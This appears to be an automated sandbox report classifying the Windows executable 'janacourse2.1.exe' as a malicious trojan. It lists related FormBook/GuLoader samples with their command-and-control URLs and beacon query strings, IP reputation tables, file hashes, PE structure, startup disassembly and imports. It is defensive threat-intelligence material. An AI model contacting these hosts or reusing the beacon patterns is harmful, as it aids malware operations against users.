                                                                                                          Overall analysis duration:0h 7m 45s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:9
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:1
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:janacourse2.1.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.evad.winEXE@8/1@8/2
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          • Number of executed functions: 43
                                                                                                          • Number of non-executed functions: 302
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 20.109.210.53, 13.107.246.45
                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          TimeTypeDescription
                                                                                                          05:08:00API Interceptor4359441x Sleep call for process: explorer.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          185.53.179.91COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.authentication-app-69447.bond/jd21/?uzud=6Gu9CMF4xxBwNWcJ0Rc7SYqx+yd/BzhFIF9ofXjjgiHpTqtqGAdfmqUQNhv6VtLeomt1&IjBDz2=9rAhxBy0
                                                                                                          MKCC-MEC-RFQ-115-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.gb-electric-wheelchairs-8j.bond/ts59/?S0GhCH=DR-Lh8FH5BP&Upql=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVrOgvyVjJmhQ
                                                                                                          2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.gb-electric-wheelchairs-8j.bond/ts59/?7n=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVo2JmSZYGQcG7mEBYw==&2d8=3fe8kxnx8zVX-2L
                                                                                                          RFQINL0607_Commerical_list.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • www.pingpongtable-sg.bond/fg83/?IpZXsVy=vgcZVq2vlo6tIZLwBMCb9IR7Fd0F2pwxk1GGseMFxnAAiVZXKfn9ZK8RnpW3pp9l3vJN&kxopsN=MlyXbd0X
                                                                                                          Scan_Doc.vbsGet hashmaliciousFormBookBrowse
                                                                                                          • www.hyperpigmentation-91528.bond/g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+
                                                                                                          E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • www.credit-cards-54889.com/mi94/?7n-Lh=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7nrLOp=h2JXJD
                                                                                                          ekstre_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • www.credit-cards-54889.com/mi94/?_N6l56=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&3fK0g=JxoL4
                                                                                                          ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • www.credit-cards-54889.com/mi94/?iN64=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7ncHc8=Tv6lQt-XnpBl3ra
                                                                                                          ekstre.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • www.credit-cards-54889.com/mi94/?-Z=6lfDx&5jbDpbb=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m
                                                                                                          E-DEKONT_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • www.credit-cards-54889.com/mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m
                                                                                                          3.33.130.190pbfe2Xcxue.exeGet hashmaliciousPonyBrowse
                                                                                                          • onecable.ca/forum/viewtopic.php
                                                                                                          RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                          • freegeoip.net/xml/
                                                                                                          file.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.emi.wtf/gd04/?uvC=N20YWnVHT5RQC6WMyDV2V8c+DcGptM14OKih1BJNLsVd899Y1bUoCinKVTGhqICNh0dB&UlPxR=-Z1dwda8VP90AL
                                                                                                          TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.medicaresbasics.xyz/fm31/
                                                                                                          236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                          • lojasdinastia.com.br/
                                                                                                          TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.medicaresbasics.xyz/fm31/
                                                                                                          profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.iglpg.online/rbqc/
                                                                                                          SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.tdassetmgt.info/d55l/
                                                                                                          goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                          • www.deikamalaharris.info/lrgf/
                                                                                                          ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.likesharecomment.net/nqht/
                                                                                                          No context
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          AMAZONEXPANSIONGBhttp://hockey30.comGet hashmaliciousUnknownBrowse
                                                                                                          • 3.33.241.219
                                                                                                          mail (4).emlGet hashmaliciousUnknownBrowse
                                                                                                          • 52.223.40.198
                                                                                                          miori.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 3.57.128.55
                                                                                                          https://www.kentuckyfriedsalmonpadon.com/caHbBZmGet hashmaliciousUnknownBrowse
                                                                                                          • 52.223.40.198
                                                                                                          https://u896278.ct.sendgrid.net/ls/click?upn=u001.qpi-2F0q-2FpcJZ7AGoG9N-2BrxLxoGn8scq-2BedBfmGHFAiwRCk-2Fciku7nsS3YfQMNNJI09mLo_nYx4-2F6dkZkjW10KMIp5mXhxys1ng1sBiI-2Bi9ROMYt6d5xhIh5rIqEUIaIxVHh8-2Ftz-2FouCgfXZk6mMUe2uKm92SOgBLlBdhjnRJuhENZnIuGoEoPqnROi7OCzdabJBBnGjEwd2iK-2BngR2RyIIgM3XrJQ7wQhHrfqScifSW3iAsv3H5nGFK9ntcSdChvkxj0yXdE-2FQ0ICDszl57i6aZSB-2Fow-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                          • 52.223.40.198
                                                                                                          https://u43161309.ct.sendgrid.net/ls/click?upn=u001.L9-2FCbhkaoUACh7As3yZ8i4iABGphfl-2FJgS6Xiu1aw6I-3DgXpA_qO4VbBWAKg4gLfGs-2BfuSyZki3gKzG4I1DrYN15Q8fD7JV1twLeLo1AFs1GBSG3ZgA22dFJdXJloKc56aXDeV3olJKTBJd8NprednZ2LeXdX-2BkcSQE-2F2FRwgBng5RbUCLfjS8-2FI3mrpwyYu9lRatIB62qUwPSax-2Fhh2c7R-2B7pT3Kos0wK0SEJGj4ZMkgOGYhEniKYT7Kn7jN25xFz2sFdtPlVQkIdCFKwDNWmq-2BrAxerZE2GuKgfkuf3l1UY4J42sOOltybAAVyLhV-2BXfmbuQpN4NpshXRIuhta8ho3ChcTA5NtgjludQThyLtwhGns-2ByLqSbpO1Bhhc-2FCgdgP-2BAOxYrGHvKHjVYRr6-2BiryADxfM-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 3.33.193.101
                                                                                                          http://click.pstmrk.itGet hashmaliciousUnknownBrowse
                                                                                                          • 3.33.192.72
                                                                                                          http://phothockey.chGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                          • 3.33.155.121
                                                                                                          http://gleapis.com/Get hashmaliciousUnknownBrowse
                                                                                                          • 3.33.148.61
                                                                                                          https://www.boulderpeptide.org/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                          • 3.33.155.121
                                                                                                          TEAMINTERNET-ASDEhttp://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                          • 185.53.178.30
                                                                                                          http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                          • 185.53.178.30
                                                                                                          yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                          • 185.53.177.50
                                                                                                          SecuriteInfo.com.Win32.Sector.30.15961.3704.exeGet hashmaliciousSalityBrowse
                                                                                                          • 185.53.178.50
                                                                                                          n5h5BaL8q0.exeGet hashmaliciousSality, XWormBrowse
                                                                                                          • 185.53.178.50
                                                                                                          PfBjDhHzvV.exeGet hashmaliciousMetasploit, SalityBrowse
                                                                                                          • 185.53.178.50
                                                                                                          https://summary.xoetispetcarerewards.com/Get hashmaliciousUnknownBrowse
                                                                                                          • 185.53.179.174
                                                                                                          https://sci-hub.tw/Get hashmaliciousUnknownBrowse
                                                                                                          • 185.53.177.50
                                                                                                          http://egynte.com/Get hashmaliciousUnknownBrowse
                                                                                                          • 185.53.178.30
                                                                                                          TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 185.53.179.93
                                                                                                          No context
                                                                                                          No context
                                                                                                          Process:C:\Users\user\Desktop\janacourse2.1.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):189440
                                                                                                          Entropy (8bit):7.8716476882579505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:MKTs04lrOYKB32QWtdWMg0l6PD/Di05bEi4oamQn9YKDwdzV1neg3ojf5R7pqwA9:lY041OYq32QKAMg0l6zu05bEiqn9J0dp
                                                                                                          MD5:E6BCBB6F32208A7971CFDED9A1AAF45D
                                                                                                          SHA1:745F741B3ADB3376EA2B4D9A0892318B804A6DDF
                                                                                                          SHA-256:1C730E6C7318726DEA9BB7F35946F5B7866B8BFEE2F60EEFA7E1946BBA9C464F
                                                                                                          SHA-512:B2F1C0CE9C69E8F95F18A36E18FBFA154323489613D76CAFB8FB8BB965B14FBAC904C4E9DE0B0C08A93C38865B9CDDB8DCD40E188E2BBDFFD9B6325FC45CC649
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:|ou..ZEWG...C...p.HB..dR9...6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEW.LQ7DV.FK.P.`.V..pe]Y*.*78 >0Zj*V&%#-h#*w;9?.\^yr..w*#5RdD:BoLYHAOWI?@...)m.r'..fG..oN..(8...O...Ek.n\..q<... T |<..AOWILQ15`.6Z.VFL5...7HKLYHAO.INP:4:Y6.GWGLQ7JI7H{.XHA_WIL.350YvZEGGLQ5JI2HJLYHAORIMQ150Y6.GWGNQ7JI7HIL..AOGILA150Y&ZEGGLQ7JI'HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7He8<05OWI.350I6ZE.ELQ'JI7HKLYHAOWILQ.5096ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7JI7HKLYHAOWILQ150Y6ZEWGLQ7
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.989227375857467
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:janacourse2.1.exe
                                                                                                          File size:1'796'096 bytes
                                                                                                          MD5:9746b0e34b3a2048074caf932a112cc1
                                                                                                          SHA1:340bca56d23ea75d9e3e8e1e15b9a9bf8b051ef8
                                                                                                          SHA256:346d6afdb252d251ce95155e05789adf73f55994f94687286dc4a0fa95327090
                                                                                                          SHA512:0d628f7e5cd6f591a80a6b5d40e9b576bd9626b8e929802930c45e47156fe37669dd5989d6d0976ff4a720bf6ac8202dce51284e5e41c79b0164bdf183d8ab14
                                                                                                          SSDEEP:49152:UTvC/MTQYxsWR7a2idKVsULUcyufvHh3O:0jTQYxsWR7idKV9Lffh
                                                                                                          TLSH:A085DF027391CD97FF6693324AEAF722167C6F6A5133E60F23943A79B970964013E613
                                                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                                          Icon Hash:173965717969338e
                                                                                                          Entrypoint:0x420577
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x677F1073 [Wed Jan 8 23:55:31 2025 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:5
                                                                                                          OS Version Minor:1
                                                                                                          File Version Major:5
                                                                                                          File Version Minor:1
                                                                                                          Subsystem Version Major:5
                                                                                                          Subsystem Version Minor:1
                                                                                                          Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                                          Instruction
                                                                                                          call 00007F3254BDF7A3h
                                                                                                          jmp 00007F3254BDF0AFh
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          mov esi, ecx
                                                                                                          call 00007F3254BDF28Dh
                                                                                                          mov dword ptr [esi], 0049FDF0h
                                                                                                          mov eax, esi
                                                                                                          pop esi
                                                                                                          pop ebp
                                                                                                          retn 0004h
                                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                                          mov eax, ecx
                                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                                          mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                          mov dword ptr [ecx], 0049FDF0h
                                                                                                          ret
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          mov esi, ecx
                                                                                                          call 00007F3254BDF25Ah
                                                                                                          mov dword ptr [esi], 0049FE0Ch
                                                                                                          mov eax, esi
                                                                                                          pop esi
                                                                                                          pop ebp
                                                                                                          retn 0004h
                                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                                          mov eax, ecx
                                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                                          mov dword ptr [ecx+04h], 0049FE14h
                                                                                                          mov dword ptr [ecx], 0049FE0Ch
                                                                                                          ret
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          mov esi, ecx
                                                                                                          lea eax, dword ptr [esi+04h]
                                                                                                          mov dword ptr [esi], 0049FDD0h
                                                                                                          and dword ptr [eax], 00000000h
                                                                                                          and dword ptr [eax+04h], 00000000h
                                                                                                          push eax
                                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                                          add eax, 04h
                                                                                                          push eax
                                                                                                          call 00007F3254BE1E4Dh
                                                                                                          pop ecx
                                                                                                          pop ecx
                                                                                                          mov eax, esi
                                                                                                          pop esi
                                                                                                          pop ebp
                                                                                                          retn 0004h
                                                                                                          lea eax, dword ptr [ecx+04h]
                                                                                                          mov dword ptr [ecx], 0049FDD0h
                                                                                                          push eax
                                                                                                          call 00007F3254BE1E98h
                                                                                                          pop ecx
                                                                                                          ret
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          mov esi, ecx
                                                                                                          lea eax, dword ptr [esi+04h]
                                                                                                          mov dword ptr [esi], 0049FDD0h
                                                                                                          push eax
                                                                                                          call 00007F3254BE1E81h
                                                                                                          test byte ptr [ebp+08h], 00000001h
                                                                                                          pop ecx
                                                                                                          Programming Language:
                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xdfc08.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1b40000x7594.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0xd40000xdfc080xdfe003f99a55ebeefb0af7bedd84ed857080fFalse0.7009385032802904data7.130985410037135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x1b40000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_ICON0xd45d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                          RT_ICON0xd47000x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                          RT_ICON0xd48280x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                          RT_ICON0xd49500x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishGreat Britain0.32996641713761576
                                                                                                          RT_ICON0x1169780x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.41837217555897316
                                                                                                          RT_ICON0x1271a00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.5098276224511247
                                                                                                          RT_ICON0x1306480x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.530452865064695
                                                                                                          RT_ICON0x135ad00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.5154700047236656
                                                                                                          RT_ICON0x139cf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5740663900414937
                                                                                                          RT_ICON0x13c2a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.5956848030018762
                                                                                                          RT_ICON0x13d3480x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.6807377049180328
                                                                                                          RT_ICON0x13dcd00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7455673758865248
                                                                                                          RT_MENU0x13e1380x50dataEnglishGreat Britain0.9
                                                                                                          RT_STRING0x13e1880x594dataEnglishGreat Britain0.3333333333333333
                                                                                                          RT_STRING0x13e71c0x68adataEnglishGreat Britain0.2735961768219833
                                                                                                          RT_STRING0x13eda80x490dataEnglishGreat Britain0.3715753424657534
                                                                                                          RT_STRING0x13f2380x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                          RT_STRING0x13f8340x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                          RT_STRING0x13fe900x466dataEnglishGreat Britain0.3605683836589698
                                                                                                          RT_STRING0x1402f80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                          RT_RCDATA0x1404500x7322cdata1.0003201893145828
                                                                                                          RT_GROUP_ICON0x1b367c0x84dataEnglishGreat Britain0.7196969696969697
                                                                                                          RT_GROUP_ICON0x1b37000x14dataEnglishGreat Britain1.25
                                                                                                          RT_GROUP_ICON0x1b37140x14dataEnglishGreat Britain1.15
                                                                                                          RT_GROUP_ICON0x1b37280x14dataEnglishGreat Britain1.25
                                                                                                          RT_VERSION0x1b373c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                          RT_MANIFEST0x1b38180x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                          DLLImport
                                                                                                          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                                                          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                          UxTheme.dllIsThemeActive
                                                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
